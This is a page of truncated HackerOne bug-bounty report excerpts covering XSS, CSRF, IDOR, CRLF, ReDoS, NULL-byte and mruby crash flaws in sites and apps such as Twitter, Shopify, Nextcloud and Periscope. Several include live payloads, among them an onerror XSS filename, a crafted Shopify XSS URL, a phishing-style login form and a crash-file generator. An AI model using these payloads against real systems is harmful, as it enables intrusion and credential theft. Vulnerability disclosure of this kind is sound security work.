HackerOne Reports
Hi, There exists a vulnerability in mruby when using the heredoc notation (it doesn't need ulimit). The minified test can be generated with the following command: `ruby -e 'IO.binwrite("j_3_.rb", "\xa7<l while\x270\x27><<i\x00" + ("\x0a" * 0x3ffd) + "i\x0a")'` log: `root@Ubuntu-1604-xenial-64-minimal ~/jtest/mruby/bin # ulimit -Sv unlimited; ruby -e 'IO.binwrite("j_3_.rb", …`
Hi Team, I have found a logical flaw (NOT DoS) in the website 'https://app.mopub.com/'. 1. Use Burp Suite and capture the below request upon navigation to *Code integration*. 2. Click on the Send button after entering an email address in the input field of 'Enter one or more email addresses and we'll send you links to …
**Summary:** I've found a DOM-based XSS vulnerability in the website **help.twitter.com** that persists via a localStorage key **lastArticleHref**. The value of this localStorage key is used to dynamically generate a piece of HTML code without proper encoding or filtering allowing an attacker to inject additional HTML code into the response. …
# Description The Simplenote Android application (1.5.6) still allows users to embed fully-fledged forms. ```html Sign in to Simplenote <h1 class="signin">Please sign in</h1> <br> <form action="https://example.com/login.php" id="login" name="login"> <fieldset class="classic-fieldset" style="border:none;"> <div class="input-fields"> <p style="margin-right: 10px;"><label for="email">Email</label><input id="email" name="email" placeholder="Email" required="" style="padding: 0.3em;font-size: 14px;font-size: 21px;font-weight: 300;max-width: 35em;height: 44px;border: px solid …
Hi everyone, Hope you are well! I come to report here an IDOR vulnerability in the Deck application of Nextcloud, allowing deletion of any attached file(s) on any cards. Nextcloud Deck app version: latest stable `1.8.0` ## Steps To Reproduce: The Nextcloud Deck application now offers the ability …
Hi, When [REXML](https://github.com/ruby/rexml) is used to parse XML that has many digits between `&#` and `x...;` in a hex numeric character reference (`&#x...;`), it may lead to ReDoS. Advisory: https://www.ruby-lang.org/en/news/2024/10/28/redos-rexml-cve-2024-49761/ ## Impact Reduced performance or Denial of Service was possible where REXML is used to parse user input.
## Summary: It's possible to list all hidden files that are located within the TVAVirtual.com SharePoint folder structure. ## Steps To Reproduce: 1. Navigate to TvaVirtual.com 2. Open the page's source code and notice that it's built using SharePoint pages. 3. Confirm that you see a listing for /SiteAssets/Scripts/js.cookie.min.js. Click …
**Description:** I found in periscope.tv a parameter "create_user" that allows injecting the "loginissignup" cookie; when tested with a CRLF payload, the response is "**HTTP/1.1 504 GATEWAY_TIMEOUT**". **Vulnerable Link:** https://www.periscope.tv/i/twitter/login?create_user=*payload*&csrf=*your_csrf_token* ## Steps To Reproduce: 1. Go to https://www.periscope.tv/ 2. Click to log in 3. Click create new account 4. Choose twitter [ google & …
Periscope android app deeplink leads to CSRF in follow action
Low
$1,540
Closed
Hello Twitter Team # Summary This issue is mainly in the Periscope Android app regarding CSRF on the follow action using a deeplink. # Description On the normal Periscope website, when we share a follow link like `www.pscp.tv/<user-id>/follow`, we get a response asking whether to follow a person or not, giving us an option, meaning CSRF protection …
I want to report an XSS bug in "ADD IMAGES". How to reproduce it: 1. Log in to your account 2. Then add images with an XSS payload in the filename (example: "><img src=x onerror=prompt(document.domain)>.png) 3. Click on the image that you uploaded 4. In the name of the picture the XSS will fire ## …
*.myshopify.com is vulnerable to a reflected cross-site scripting attack in the newsletter form. This can be crafted to trigger on a page load without any further user interaction. The following example URL shows this vulnerability: `https://testbuguser.myshopify.com/?contact[email]%20onfocus%3djavascript:alert(%27xss%27)%20autofocus%20a=a&form_type[a]aaa` This was tested on a newly registered store "testbuguser.myshopify.com". If you require …
Burp Suite utilizes an embedded Chrome browser for crawling and scanning web applications. The Chrome instance is launched in headless mode, with remote debugging enabled via the remote-debugging websocket port instead of remote-debugging-pipe. As a result, a known XSS vulnerability in Chrome can be leveraged in combination with a JavaScript …
Unable to register since the passwords are unable to match. Check the attachment.
# Description: Microsoft .NET Framework is prone to multiple NULL-byte injection vulnerabilities because it fails to adequately sanitize user-supplied data. # Vulnerable URL: https://████/%2F%20This%20website%20is%20vulnerable%20to%20NULL%20BYTE%20INJECTION/ # Steps to Reproduce: 1) An attacker can exploit this issue via a browser. The following example URI request is available: https://███████/%2F%20This%20website%20is%20vulnerable%20to%20NULL%20BYTE%20INJECTION%00 # Mitigation: https://www.securityfocus.com/bid/24791/solution # See Also: https://www.exploit-db.com/exploits/30281 # Proof of …
Hi there, It is possible to delete anyone's added email, telephone, fax, address, or Skype via CSRF using the `GET` method. The action is performed via a `GET` method without any CSRF protection. # Steps to reproduce - log in to your https://academy.acronis.com account - navigate to `https://academy.acronis.com/#/account/edit/account_id/<your_id>` - add any email, telephone, fax, address, or Skype - try deleting them and capture the …